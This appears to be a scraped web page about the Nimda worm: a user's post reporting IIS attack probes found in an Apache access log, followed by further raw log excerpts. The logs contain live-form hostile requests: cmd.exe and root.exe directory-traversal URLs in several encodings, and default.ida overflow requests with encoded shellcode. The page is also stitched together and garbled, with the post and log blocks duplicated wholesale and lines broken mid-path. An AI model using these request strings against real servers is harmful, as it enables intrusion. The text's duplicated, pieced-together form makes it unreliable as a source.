![Dir Dir](/uploads/1/2/6/4/126460639/129425479.jpg)
The Nimda worm, also known as W32.Nimda.A@mm, Code Rainbow, Minda, Nimbda, is a self-replicating piece of software that infects IIS web servers as well as users running Internet Explorer 5.
Yesterday I happened to check /var/log/httpd/access_log and found some funny things like these,
209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 265
Obviously, the access treated my machine like NT/IIS. As we can see from the log, it was trying harder and harder. If I had not shut down port 80, it would have created hundreds of lines in the log file. I also checked the log of the past 3 months, there are about 200 tries of this kind from various ranges of IP address.
I think this is apparently virus attack. Has anybody here ever found such log? I just dial-up to the Internet and the connection lasted for about 30 minutes and I got this attack. I would keep my httpd closed. Thank god, my system is Linux, not NT.
209.127.62.159 - - [30/Sep/2001:21:23:09 -0400] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 210
209.127.62.159 - - [30/Sep/2001:21:23:10 -0400] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 208
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 218
209.127.62.159 - - [30/Sep/2001:21:23:11 -0400] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 218
209.127.62.159 - - [30/Sep/2001:21:23:12 -0400] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 232
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 249
209.127.62.159 - - [30/Sep/2001:21:23:13 -0400] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 249
209.127.62.159 - - [30/Sep/2001:21:23:14 -0400] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 265
Obviously, the access treated my machine like NT/IIS. As we can see from the log, it was trying harder and harder. If I had not shut down port 80, it would have created hundreds of lines in the log file. I also checked the log of the past 3 months, there are about 200 tries of this kind from various ranges of IP address.
I think this is apparently virus attack. Has anybody here ever found such log? I just dial-up to the Internet and the connection lasted for about 30 minutes and I got this attack. I would keep my httpd closed. Thank god, my system is Linux, not NT.
apache access log
24.162.164.121 - - [04/Apr/2003:16:50:47 -0600] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0'
404 333
24.162.164.121 - - [04/Apr/2003:16:50:53 -0600] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir HTTP/1.0' 404 349
24.162.164.121 - - [04/Apr/2003:16:50:57 -0600] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:00 -0600] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:03 -0600] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:07 -0600] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:11 -0600] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:16:51:14 -0600] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:16:51:16 -0600] 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:16:51:19 -0600] 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.119.123 - - [04/Apr/2003:17:51:02 -0600] 'GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0' 404 289
24.162.29.46 - - [04/Apr/2003:18:01:10 -0600] 'GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090 %u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0' 404 289
24.162.164.121 - - [04/Apr/2003:18:29:25 -0600] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 294
24.162.164.121 - - [04/Apr/2003:18:29:28 -0600] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 292
24.162.164.121 - - [04/Apr/2003:18:29:30 -0600] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 302
24.162.164.121 - - [04/Apr/2003:18:29:33 -0600] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 302
24.162.164.121 - - [04/Apr/2003:18:29:36 -0600] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:18:29:38 -0600] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0'
404 333
24.162.164.121 - - [04/Apr/2003:18:29:41 -0600] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0'
404 333
24.162.164.121 - - [04/Apr/2003:18:29:45 -0600] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir HTTP/1.0' 404 349
24.162.164.121 - - [04/Apr/2003:18:29:51 -0600] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:54 -0600] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:57 -0600] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:59 -0600] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:30:01 -0600] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:18:30:03 -0600] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:18:30:04 -0600] 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:18:30:04 -0600] 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:16:50:47 -0600] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0'
404 333
24.162.164.121 - - [04/Apr/2003:16:50:53 -0600] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir HTTP/1.0' 404 349
24.162.164.121 - - [04/Apr/2003:16:50:57 -0600] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:00 -0600] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:03 -0600] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:07 -0600] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:16:51:11 -0600] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:16:51:14 -0600] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:16:51:16 -0600] 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:16:51:19 -0600] 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.119.123 - - [04/Apr/2003:17:51:02 -0600] 'GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0' 404 289
24.162.29.46 - - [04/Apr/2003:18:01:10 -0600] 'GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090 %u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0' 404 289
24.162.164.121 - - [04/Apr/2003:18:29:25 -0600] 'GET /scripts/root.exe?/c+dir HTTP/1.0' 404 294
24.162.164.121 - - [04/Apr/2003:18:29:28 -0600] 'GET /MSADC/root.exe?/c+dir HTTP/1.0' 404 292
24.162.164.121 - - [04/Apr/2003:18:29:30 -0600] 'GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 302
24.162.164.121 - - [04/Apr/2003:18:29:33 -0600] 'GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 302
24.162.164.121 - - [04/Apr/2003:18:29:36 -0600] 'GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:18:29:38 -0600] 'GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0'
404 333
24.162.164.121 - - [04/Apr/2003:18:29:41 -0600] 'GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0'
404 333
24.162.164.121 - - [04/Apr/2003:18:29:45 -0600] 'GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system
32/cmd.exe?/c+dir HTTP/1.0' 404 349
24.162.164.121 - - [04/Apr/2003:18:29:51 -0600] 'GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:54 -0600] 'GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:57 -0600] 'GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:29:59 -0600] 'GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 315
24.162.164.121 - - [04/Apr/2003:18:30:01 -0600] 'GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:18:30:03 -0600] 'GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 400 299
24.162.164.121 - - [04/Apr/2003:18:30:04 -0600] 'GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316
24.162.164.121 - - [04/Apr/2003:18:30:04 -0600] 'GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0' 404 316